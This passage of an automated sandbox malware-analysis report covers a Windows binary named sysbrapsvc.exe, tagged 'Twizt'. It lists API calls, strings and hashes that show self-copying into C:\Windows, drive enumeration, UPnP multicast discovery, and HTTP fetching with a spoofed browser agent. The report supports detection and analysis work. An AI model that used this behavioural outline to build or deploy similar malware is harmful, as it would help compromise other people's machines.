                                                                                • Opcode ID: 4497637cd0b756bf78cd114f633b1d148b8706e28ae781032a38565040356a71
                                                                                • Instruction ID: 34cf97d68150feb52ab64e4c1d62c08212747bf40ca63f75f299d91bb9f0c47d
                                                                                • Opcode Fuzzy Hash: 4497637cd0b756bf78cd114f633b1d148b8706e28ae781032a38565040356a71
                                                                                • Instruction Fuzzy Hash: 5D313A74A40308EBEB10DBA4CD4ABAFB770EB44704F208529E601772D0D7B96A81CF99

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 400 40ee30-40ee90 memset * 2 CreateProcessW 401 40eea1-40eec5 ShellExecuteW 400->401 402 40ee92-40ee9f Sleep 400->402 404 40eed6 401->404 405 40eec7-40eed4 Sleep 401->405 403 40eed8-40eedb 402->403 404->403 405->403
                                                                                APIs
                                                                                • memset.NTDLL ref: 0040EE3E
                                                                                • memset.NTDLL ref: 0040EE4E
                                                                                • CreateProcessW.KERNELBASE(00000000,00407896,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EE87
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EE97
                                                                                • ShellExecuteW.SHELL32(00000000,open,00407896,00000000,00000000,00000000), ref: 0040EEB2
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EECC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                • String ID: $D$open
                                                                                • API String ID: 3787208655-2182757814
                                                                                • Opcode ID: aaa8efd2447e76ebee4be6377d3fcdc8a7337733f8d70036db534e1e8db572fc
                                                                                • Instruction ID: ab95b539b52ee8c861e7b35bb7843e11e17158efae48c82db73052011d4181fd
                                                                                • Opcode Fuzzy Hash: aaa8efd2447e76ebee4be6377d3fcdc8a7337733f8d70036db534e1e8db572fc
                                                                                • Instruction Fuzzy Hash: F2113071A4430CBAEB10DB90DD46FDE7764AB14B00F104125FA057E2C0D6F5AA548759

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 406 40dd40-40dd5a 407 40dd6b-40dd72 406->407 408 40de24-40de2d 407->408 409 40dd78-40dd97 recvfrom 407->409 410 40dda6-40ddc3 StrCmpNIA 409->410 411 40dd99-40dda4 Sleep 409->411 413 40ddc5-40dde4 StrStrIA 410->413 414 40de1f 410->414 412 40dd5c-40dd65 411->412 412->407 413->414 415 40dde6-40de1d StrChrA call 40cd50 413->415 414->412 415->414
                                                                                APIs
                                                                                • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DD8E
                                                                                • Sleep.KERNELBASE(000003E8), ref: 0040DD9E
                                                                                • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DDBB
                                                                                • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DDD1
                                                                                • StrChrA.SHLWAPI(?,0000000D), ref: 0040DDFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleeprecvfrom
                                                                                • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                • API String ID: 668330359-3973262388
                                                                                • Opcode ID: eefe196d39f416e400a4d4ef2e05462a5a71bb0c03a382919cece79f19d7d758
                                                                                • Instruction ID: 7b96b2f8d6d36e055c6c7570a615b3eea8bd5cb55d36e980e60cabbeadb8daeb
                                                                                • Opcode Fuzzy Hash: eefe196d39f416e400a4d4ef2e05462a5a71bb0c03a382919cece79f19d7d758
                                                                                • Instruction Fuzzy Hash: 78216FB5940218ABDB20DB64DC49BE97774AF04308F1085E9E709BB2D0D6B95AC6CF9C

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 418 40eee0-40ef04 InternetOpenA 419 40ef06-40ef23 InternetOpenUrlA 418->419 420 40ef78-40ef89 Sleep 418->420 421 40ef25-40ef4c HttpQueryInfoA 419->421 422 40ef6e-40ef72 InternetCloseHandle 419->422 423 40ef64-40ef68 InternetCloseHandle 421->423 424 40ef4e-40ef56 421->424 422->420 423->422 424->423 425 40ef58-40ef60 424->425 425->423
                                                                                APIs
                                                                                • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EEF7
                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EF16
                                                                                • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EF3F
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EF68
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EF72
                                                                                • Sleep.KERNELBASE(000003E8), ref: 0040EF7D
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EEF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                • API String ID: 2743515581-2272513262
                                                                                • Opcode ID: be2b98b0d1d94f3769b5301c8c7766c76a7eb5c2fd3991898107c864a0abb6dc
                                                                                • Instruction ID: 09246262baac8142bf73057cdf9805b9640511cbdee0a0d8a20d2e1b7007a2ac
                                                                                • Opcode Fuzzy Hash: be2b98b0d1d94f3769b5301c8c7766c76a7eb5c2fd3991898107c864a0abb6dc
                                                                                • Instruction Fuzzy Hash: 6A210A75A40309FBDB10DFA4CC49FEEB775AB08705F1085A9FA11AB2C0C7B96A44CB59
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(C:\Users\user\tbtnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B0C8
                                                                                • WriteFile.KERNELBASE(000000FF,00000000,?,?,00000000), ref: 0040B0E9
                                                                                • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B0F3
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040B0FD
                                                                                • InterlockedExchange.KERNEL32(00419828,0000003D), ref: 0040B10A
                                                                                Strings
                                                                                • C:\Users\user\tbtnds.dat, xrefs: 0040B0C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                • String ID: C:\Users\user\tbtnds.dat
                                                                                • API String ID: 442028454-4031448526
                                                                                • Opcode ID: 1e9444d5750d37bbbcc857e4368f663b0b7ba3596edf0d01e927ecec2ec7da89
                                                                                • Instruction ID: 65abf3b26d1f33ce57344cf3d4c90c2ddc2d392c326f45743aae56010b0155a0
                                                                                • Opcode Fuzzy Hash: 1e9444d5750d37bbbcc857e4368f663b0b7ba3596edf0d01e927ecec2ec7da89
                                                                                • Instruction Fuzzy Hash: D33149B8A40208EBCB14DF94EC45FAEB7B1FB48300F208569E511A7391D775AA51CB9A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                • String ID: %s%s
                                                                                • API String ID: 1447977647-3252725368
                                                                                • Opcode ID: 51ae6eda0d425cdf9ddaf6c3c8cff51808a0295876ba3643fa7b81f5b4b7d6d9
                                                                                • Instruction ID: 9050299abbe0a346d3081233791c3133021d614aeebffb5e53434d9287984c88
                                                                                • Opcode Fuzzy Hash: 51ae6eda0d425cdf9ddaf6c3c8cff51808a0295876ba3643fa7b81f5b4b7d6d9
                                                                                • Instruction Fuzzy Hash: 30310DB4C00218DFCB50DF95DC88BEDBBB4FB48304F1085AAE609B6290D7795A84CF5A
                                                                                APIs
                                                                                • GetLogicalDrives.KERNELBASE ref: 00406346
                                                                                • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                                • RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                                Strings
                                                                                • NoDrives, xrefs: 004063B8
                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                • API String ID: 2666887985-3471754645
                                                                                • Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                                • Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
                                                                                • Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                                • Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D634
                                                                                  • Part of subcall function 0040D700: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D740
                                                                                  • Part of subcall function 0040D700: CloseHandle.KERNEL32(?), ref: 0040D759
                                                                                • CreateThread.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 0040D68F
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D6CC
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D6D7
                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 0040D6DE
                                                                                • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D6F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 2251373460-0
                                                                                • Opcode ID: df6a6ebe43e350ee9e2e3ef0cc0677f8426168fd7d8f62afba8d156cc08b655c
                                                                                • Instruction ID: f472e5e68ab63b0dd33345cd9092821366bebf82f5afbdb011aebb5a24a45ce9
                                                                                • Opcode Fuzzy Hash: df6a6ebe43e350ee9e2e3ef0cc0677f8426168fd7d8f62afba8d156cc08b655c
                                                                                • Instruction Fuzzy Hash: 5D310A74A00208EFDB04DF98D889B9EBBB5FF49308F0085A9E905A7390D775EA95CF54
                                                                                APIs
                                                                                • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                • htons.WS2_32(?), ref: 00401281
                                                                                • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                • String ID: pdu
                                                                                • API String ID: 2164660128-2320407122
                                                                                • Opcode ID: 4f2e69fc86119e98b8d82d5b4d5fedd48789e739a052b8fc27d84ba777224162
                                                                                • Instruction ID: 1b6d4435c5f8e1f149c0fb86e6a0c1a3006a9f031597685944d6c13f048a50c8
                                                                                • Opcode Fuzzy Hash: 4f2e69fc86119e98b8d82d5b4d5fedd48789e739a052b8fc27d84ba777224162
                                                                                • Instruction Fuzzy Hash: E931B2362083009BC710DF69D884A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002,?,?,00407ECD), ref: 00406F78
                                                                                • SysAllocString.OLEAUT32(C:\Windows\sysbrapsvc.exe), ref: 00406F83
                                                                                • CoUninitialize.OLE32 ref: 00406FA8
                                                                                  • Part of subcall function 00406FC0: SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00406FA2
                                                                                Strings
                                                                                • C:\Windows\sysbrapsvc.exe, xrefs: 00406F7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String$Free$AllocInitializeUninitialize
                                                                                • String ID: C:\Windows\sysbrapsvc.exe
                                                                                • API String ID: 459949847-94466369
                                                                                • Opcode ID: aac59f4c634c6c7e69739dc525912ddcdb212d49f49b460d16b2d8434ec6ae87
                                                                                • Instruction ID: c509d36c12d7ba2a5f650eb278e956dc9bc0801d495f3ab7a1e1adcf34b7a620
                                                                                • Opcode Fuzzy Hash: aac59f4c634c6c7e69739dc525912ddcdb212d49f49b460d16b2d8434ec6ae87
                                                                                • Instruction Fuzzy Hash: 57E0DFB4941308FBCB00EBE0EE0EB8D7738EB04315F004078F90267291DABA9E90CB19
                                                                                APIs
                                                                                • GetDriveTypeW.KERNELBASE(0040629F), ref: 004062CD
                                                                                • QueryDosDeviceW.KERNELBASE(0040629F,?,00000208), ref: 0040630C
                                                                                • StrCmpNW.KERNELBASE(?,\??\,00000004), ref: 00406324
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeviceDriveQueryType
                                                                                • String ID: \??\
                                                                                • API String ID: 1681518211-3047946824
                                                                                • Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                                                                • Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
                                                                                • Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                                                                • Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C
                                                                                APIs
                                                                                • ioctlsocket.WS2_32 ref: 0040112B
                                                                                • recvfrom.WS2_32 ref: 0040119C
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                • String ID:
                                                                                • API String ID: 3980219359-0
                                                                                • Opcode ID: 040756bc7d30765698bbdbc2b7edff8924aad6f67f943ab09c6075d22f1106d0
                                                                                • Instruction ID: dd229b18b8e608a96638b9a50d19e2d27eaf393d2ffc9a5ffa46aac6cea4a516
                                                                                • Opcode Fuzzy Hash: 040756bc7d30765698bbdbc2b7edff8924aad6f67f943ab09c6075d22f1106d0
                                                                                • Instruction Fuzzy Hash: 7C21C3B1504301AFD304DF65DC84A6BB7E9EF88318F004A3EF555A6290E774D9588BEA
                                                                                APIs
                                                                                  • Part of subcall function 00407250: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFreeInstanceString
                                                                                • String ID: Microsoft Corporation
                                                                                • API String ID: 586785272-3838278685
                                                                                • Opcode ID: 690b5235c47795fc41d87c923ea1756cc9ab4385446be0044075a6540b9607f4
                                                                                • Instruction ID: 3bd6e37ccb81fb26e20ba6f4aecac2bab56e95e75b440682a2c5ba52433a4c42
                                                                                • Opcode Fuzzy Hash: 690b5235c47795fc41d87c923ea1756cc9ab4385446be0044075a6540b9607f4
                                                                                • Instruction Fuzzy Hash: 2D91EC75A0410ADFCB04DF94C894AAFB7B5BF49304F208169E515BB3E0D734AD41CBA6
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407EC8), ref: 0040DAFA
                                                                                  • Part of subcall function 0040DBC0: socket.WS2_32(00000002,00000002,00000011), ref: 0040DBDA
                                                                                  • Part of subcall function 0040DBC0: htons.WS2_32(0000076C), ref: 0040DC10
                                                                                  • Part of subcall function 0040DBC0: inet_addr.WS2_32(239.255.255.250), ref: 0040DC1F
                                                                                  • Part of subcall function 0040DBC0: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DC3D
                                                                                  • Part of subcall function 0040DBC0: bind.WS2_32(000000FF,?,00000010), ref: 0040DC73
                                                                                  • Part of subcall function 0040DBC0: lstrlenA.KERNEL32(00411C48,00000000,?,00000010), ref: 0040DC8C
                                                                                  • Part of subcall function 0040DBC0: sendto.WS2_32(000000FF,00411C48,00000000), ref: 0040DC9B
                                                                                  • Part of subcall function 0040DBC0: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DCB5
                                                                                  • Part of subcall function 0040DE30: SysFreeString.OLEAUT32(00000000), ref: 0040DF0B
                                                                                  • Part of subcall function 0040DE30: SysFreeString.OLEAUT32(00000000), ref: 0040DF15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                • String ID: TCP$UDP
                                                                                • API String ID: 1519345861-1097902612
                                                                                • Opcode ID: f2a508b97fbae45076dd5aa5ad3ba9adeb76e4e7dff97a5c25cb73082fa5fcae
                                                                                • Instruction ID: 6b43ad666573891978052671c2ef92d80966ae61c726f1f98895f42c7cfd0708
                                                                                • Opcode Fuzzy Hash: f2a508b97fbae45076dd5aa5ad3ba9adeb76e4e7dff97a5c25cb73082fa5fcae
                                                                                • Instruction Fuzzy Hash: 13117CB5D00208ABDB00EFE5DC46BAEB375EB44308F10856AE405772C6D7786A64CF9A
                                                                                APIs
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CF8C
                                                                                • InterlockedIncrement.KERNEL32(000000FF), ref: 0040CFC1
                                                                                • InterlockedDecrement.KERNEL32(000000FF), ref: 0040D0C4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$DecrementExchangeIncrement
                                                                                • String ID:
                                                                                • API String ID: 2813130747-0
                                                                                • Opcode ID: f07d07808116d01262f8deb1295e0be634e7f723a0f1bb6a6e3719addcf20d22
                                                                                • Instruction ID: c84f62e62097384c753cec2b1afe61742353190dca667db28db9568c8f96fbfb
                                                                                • Opcode Fuzzy Hash: f07d07808116d01262f8deb1295e0be634e7f723a0f1bb6a6e3719addcf20d22
                                                                                • Instruction Fuzzy Hash: 2241B4B5E00208ABDF00EBE4D845BAF7B75AF04308F04856DF5097B2C2D679D649C79A
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(Twizt,0040CFE6,0040CFE6,?,?,0040CFE6,000000FF,0040CFE6,0040CFE6,000000FF,00000000), ref: 0040B97C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen
                                                                                • String ID: Twizt$Twizt
                                                                                • API String ID: 1659193697-16428492
